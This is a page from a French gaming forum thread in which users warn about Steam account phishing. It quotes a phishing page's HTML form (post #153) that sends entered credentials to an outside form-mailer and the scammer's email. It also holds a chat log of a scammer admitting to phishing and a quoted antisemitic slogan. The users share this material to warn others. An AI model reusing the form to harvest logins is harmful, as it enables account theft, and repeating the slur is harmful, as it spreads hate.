Crunchez vos adresses URL
|
Rejoignez notre discord
|
Hébergez vos photos
Page 6 sur 16 PremièrePremière 1234567891011121314 ... DernièreDernière
Affichage des résultats 151 à 180 sur 476
  1. #151
    Charmant le profil de leur groupe (qui s'appelle Hamas) :
    Citation Envoyé par Emperor Napoleon III of France
    Hail Hamas and Death to the Jewish Dickheads for i am a Frenchmen but i fully Support HAMAS and The Muslims against the Jewish Dickheads
    D'ailleurs, on peut pas signaler ce genre de groupes/messages ?
    Citation Envoyé par rofidal
    Je voudrais votre avis sur les meilleurs mods star wars quelques soit le jeux
    J'en ai trouvé pleins ok, mais est ce les meilleurs ???

  2. #152
    Bien sûr que si.

    Y'a un bouton pour ça.
    Citation Envoyé par Sheldor sur le site Highlander
    Dehors les sarrasins, les garnements, les grands benêts.

  3. #153
    Quoi qu'il en soit le code source de la page est de toute beauté

    <form method="POST" action="http://formfixer.com/ff/ff.cgi">
    <input type="hidden" name="s_email" value="redlot.dji@gmail.com">
    <input type="hidden" name="s_retur" value="http://steampowered.host-ed.net/error.html">


  4. #154
    C'est moi, ou ils nous prennent pour des c*** chez Steam quand on fait leur boulot :

  5. #155
    C'est de l'humour Steam, rien d'anormal.
    Citation Envoyé par Cartapouille Voir le message
    mais quel bonheur de taper mes enfants!!

  6. #156
    Ouah la version 2.1 beta de Steam!!! Trop la classouille! Et puis pas de jeux gratuits c'est plus crédible
    Ah oui et super les messages antisémites du groupe. Je te leur enverrai les flics direct chez eux moi...

  7. #157
    Suite de l'histoire.

    12:20 - Weedeuse.GiRls: salut
    12:21 - [CPC]Hamtarotaro: tu peut me dire pourquoi tu envoie des messages de scam a ma belle soeur sur steam?
    12:21 - Weedeuse.GiRls: pcq je veux un compte steam avec left 4 dead :P
    12:22 - [CPC]Hamtarotaro: t'a gagné un report a steam. plus ton site qui va bientot tomber
    12:23 - Weedeuse.GiRls: lol steam me fera rien et le site je fais un nouveau en 8 clic :P
    12:23 - [CPC]Hamtarotaro: whouaaa t'es un super hacker!!!!
    12:23 - Weedeuse.GiRls: j'ai juste a faire un nouveau compte sur le site et upload les fichier vite fait ^^
    12:23 - Weedeuse.GiRls: non je ne suis pas une hacker
    12:23 - Weedeuse.GiRls: j'utilise juste une page e phishing pourri
    12:24 - [CPC]Hamtarotaro: continue, ca m'interesse!!
    12:24 - Weedeuse.GiRls: achete ma bio :P
    12:25 - [CPC]Hamtarotaro: ca m'etonne, d'habitude les petits cons qui se prennent pour des malfaiteurs on un QI d'huitre mais toi tu sais au moins ecrire (a peu pres) t'a du au moins aller a l'ecole c'est bien mais il on du oublier un chapitre ou deux.
    12:27 - [CPC]Hamtarotaro: Tu connais le protocole TCP/IP?
    12:28 - Weedeuse.GiRls: je te retourne le compliment pour l'écriture aussi
    12:28 - Weedeuse.GiRls: t'écris pas si bien que ca aussi
    12:28 - Weedeuse.GiRls: oui et tu ne me fait pas peur
    12:28 - Weedeuse.GiRls: tu veux mon ip ?
    12:28 - [CPC]Hamtarotaro: Oh loin de moi l'idée de te faire peur .
    12:29 - Weedeuse.GiRls: attends 2 sec je te donne mon IP
    12:29 - [CPC]Hamtarotaro: non c'etait juste pour faire la discussion.
    12:29 - [CPC]Hamtarotaro: 192.168.1.10 non?
    12:29 - Weedeuse.GiRls: :/
    12:29 - Weedeuse.GiRls: ip local ca
    12:30 - [CPC]Hamtarotaro: !! You win a twix!
    12:30 - Weedeuse.GiRls: et non moi c'est .1.3 en local
    12:31 - [CPC]Hamtarotaro: Si tu saius toute ces choses c'est que t'a l'air moins conne que la moyenne (je me repete je sais) et ca me ramene a une question, pourquoi voler les autres avec des tentatives si basses? (d'ailleurs voler tout court)
    12:31 - [CPC]Hamtarotaro: Je sais pas moi, va fumer un joint de weed et ecoute un bon reggae.
    12:32 - Weedeuse.GiRls: pcq je veux un compte L4D et je suis dans un pays ou je peux pas l'acheter si je trouve un qui veut bien échanger mon compte steam contre L4D je stop je fais pas ça pour avoir 36000 comptes
    12:32 - Weedeuse.GiRls: je fume pas :D
    12:33 - Weedeuse.GiRls: C'est juste un pseudo pour ne pas mettre mon vrai pseudo

  8. #158
    Tu as oublié de lui dire que c'est débile de vouloir un compte steam vu que ça se récupéré en 4 jours max.

  9. #159
    Citation Envoyé par Ezechiel Voir le message
    J'ai eu le même en entrant effectivement. Pas très grave, c'est pas souvent. Mais j'ai jamais décroché par contre, je sais pas ce qu'ils te racontent...
    Alors pour ce genre d'appels à la con, car ils font sonner ton téléphone une fois (0899...etc), tu rappelles machinalement et la paf 1€/mn.

    J'avais vu tout ça sur un reportage M6 où un service spécial se charge d'enquêter et de couper la ligne de ces spammeurs.

    Donc, il existe désormais un site du ministère qui collecte toute les infos sur les spams via sms (j sui 1 koquin chode..... tout ca quoi) ou les appels reçus à partir de 0899 qui raccrochent dès la première sonnerie. Il suffit de les retransférer au 33700 et répondre au sms qui sera renvoyé par la plateforme de collecte en joignant le numéro de tel qui a servi à envoyer le spam.

    Bien sur la délation est gratuite .

  10. #160
    Mise à jour de Gmod pour protéger les serveurs en date du 8 février. C'était inutile de le préciser mais j'avais envie.

  11. #161
    Attention j'ai eu la proposition de la part de Woshee http://steamcommunity.com/profiles/76561197995962613, il a dû se faire pirater son compte le pauvre, pour aller sur cette page poufpoufpouf/

    C'est bien un hack http://www.encyclopedia.com/video/_2...r-steam-2.aspx
    Dernière modification par Flubber ; 28/02/2010 à 22h51. Motif: Autant ne pas afficher le lien.
    Stealthpunk (voleur)/ Krill Mangetémor(nécro)

  12. #162
    +1 pour woshee

    LUi dire "Pute de hacker" c'est trop violent ?

    -.-.-– nAKAZZ, depuis 2024

  13. #163
    Je confirme et il n'est pas bavard... pour l'instant

  14. #164

  15. #165
    Merci d'avoir créé un event pour prévenir d'ailleurs.

  16. #166
    Je sais pas si c'est bien utile, mais si ça permet d'éviter ne serait-ce qu'à un canard de se faire avoir...

    EDIT : j'ai supprimé l'event et ai déplacé le contenu dans les announcements
    Dernière modification par alx ; 01/03/2010 à 01h45.
    Winners don't use drugs -- Williams S. Session, Director, FBI
    Steam / Config




  17. #167
    Yo,

    Faites gaffe si vous recevez un message privé de quelqu'un sur steam du style "Inscrivez vous au tournoi Steam/Gameone", ne rentrez pas vos identifiants dans le lien qui est donné pour éviter de perdre l'accès a votre compte steam.

    Je l'ai fait comme un con, donc y'a de grandes chance que mes amis reçoivent un MP de moi, comme y'a pas mal de canards je préfère prévenir... désolé...

  18. #168
    Je me suis permis de fusionner vu que t'as déjà été grillé
    J'ai laissé une redirection pour que ton message soit encore visible dans la partie TF2.

    T'as perdu ton compte et tu l'as récupéré?
    Conspiracy forever - Lordz of Ragequit for the win - Choupinou un jour, Choupinou toujours

  19. #169
    Putain les boules, vraiment désolé qu'a cause de ma naiveté pour receviez ce genre de MP...

    Je suis en train d'envoyer un ticket a steam...

  20. #170
    Perso, j'ai trouvé ça très bien d'être informé via un event, qu'un malfrat rôde autour de la marre aux canards...

  21. #171
    Citation Envoyé par Ezechiel Voir le message
    Je me suis permis de fusionner vu que t'as déjà été grillé
    J'ai laissé une redirection pour que ton message soit encore visible dans la partie TF2.

    T'as perdu ton compte et tu l'as récupéré?
    Sauf que tu as deplacer tout le topic sale naze :P

  22. #172
    Laisse le topic en général et non sur TF2, on va pas le retrouver, ce topic est d'utilité publique!!!!!
    Stealthpunk (voleur)/ Krill Mangetémor(nécro)

  23. #173
    Créer des events sur Steam est une bonne idée.

  24. #174
    Merde, pas Woshiee, mon ingé préféré
    J'espère que tu va vite récupérer ton compte.

  25. #175
    Ouais carrément, vous avez géré pour l'event !
    OMFGRegal is a SPY.

  26. #176
    Winners don't use drugs -- Williams S. Session, Director, FBI
    Steam / Config




  27. #177
    L'event est une très bonne idée Par contre je pense qu'il faudrait mieux lui donner un intitulé bien clair et moins "private joke"
    "Les gens soit ils sont mal informés, soit ils sont con" - Colbaq
    Les piti liens de Vader

  28. #178
    Citation Envoyé par Nortifer Voir le message
    Sauf que tu as deplacer tout le topic sale naze :P
    Mais qu'est ce qu'il dit lui
    Bin j'ai déplacé le topic de Woshee pour le fusionner avec celui ci en laissant une redirection. What else?
    Conspiracy forever - Lordz of Ragequit for the win - Choupinou un jour, Choupinou toujours

  29. #179
    Nan mais t'avais laissé le topic de Phishing dans le forum TF2 en fusionnant du coup. J'ai redéplacé le topic phishing dans la partie Jeux online.

  30. #180
    Citation Envoyé par Woshee Voir le message
    Y "Inscrivez vous au tournoi Steam/Gameone", ne rentrez pas vos identifiants dans le lien qui est donné pour éviter de perdre l'accès a votre compte steam.
    Rappel: Valve ne demandera jamais ton identifiant/mot de passe. Alors c'est pas pour un tournoi pourri qu'ils le feront.


    -.-.-– nAKAZZ, depuis 2024

Règles de messages

  • Vous ne pouvez pas créer de nouvelles discussions
  • Vous ne pouvez pas envoyer des réponses
  • Vous ne pouvez pas envoyer des pièces jointes
  • Vous ne pouvez pas modifier vos messages
  •